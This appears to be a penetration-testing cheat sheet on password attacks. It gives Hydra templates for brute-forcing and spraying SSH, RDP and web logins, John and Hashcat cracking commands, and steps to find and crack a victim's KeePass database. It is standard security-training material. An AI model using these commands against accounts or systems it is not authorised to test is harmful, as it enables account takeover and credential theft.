Password attacks

Online Brute force

Hydra

Brute forcing SSH 

hydra -l <username> -P <password_wordlist> -s <ssh_port> ssh://<target>

Password spraying RDP

hydra -L <username_wordlist> -p <password> rdp://<target>

Brute forcing website login form

hydra -l <username> -P <wordlist> <target> http-post-form "/<login_page_route>:<username_paramter>=user&<password_paramter>=^PASS^:<failed_login_string>"

Brute forcing basic authentication

hydra -l <username> -P <wordlist> <target> http-get

Offline Brute force

John the ripper

Perform offline hash crack:

john --wordlist=<wordlist> <hashfile>

Hashcat

Find hash types:

hashcat --help | grep -i "KeePass"

Perform offline hash crack:

hashcat -m <hash_type> <hash> <wordlist>

Password Manager

In case the foothold is achieved and the victims uses KeePass is possible to offline crack the master password.

Finding the database file on target machine:

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Creating a crackable hash using keepass2john :

keepass2john Database.kdbx > keepass.hash

Cracking the hash using hashcat:

hashcat -m 13400 keepass.hash ~/wordlists/rockyou.txt

Identify the hash

Hash-Identifier

hash-identifier
hash-identifier

Hashid

hashid <hash>
hashid

Wordlists

Modify wordlists according to target password policy using Hashcat and a rule file:

rulefile.rule
rules examples:
$<string> - append the string.
^<string> - prepend the string.
c - capitalize the first character.

rules operations:
rule rule rule - the rules affects each word together.

the rules affects separately and creates more words (1 more word each rule):
rule
rule

More rule functions:

Logorule_based_attack [hashcat wiki]
Rule Functions

There are commonly rule files in the Hashcat directory:

ls -la /usr/share/hashcat/rules/

Create and print the new rule based wordlist

hashcat -r <rulefile> --stdout <wordlist>

Hashcat

Crack using the new rule based wordlist

hashcat -m <hash_type> <hash> <wordlist> -r <rulefile>

John

Create rule file for example:

[List.Rules:<rule_name>]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#

Append the rule file into /etc/john/john.conf:

sudo bash -c 'cat <rulefile> >> /etc/john/john.conf'

Crack using the new rule based wordlist

john --wordlist=<wordlist> --rules=<rule_name> <hashfile>
PreviousAntivirus EvasionNextReverse Shells

Last updated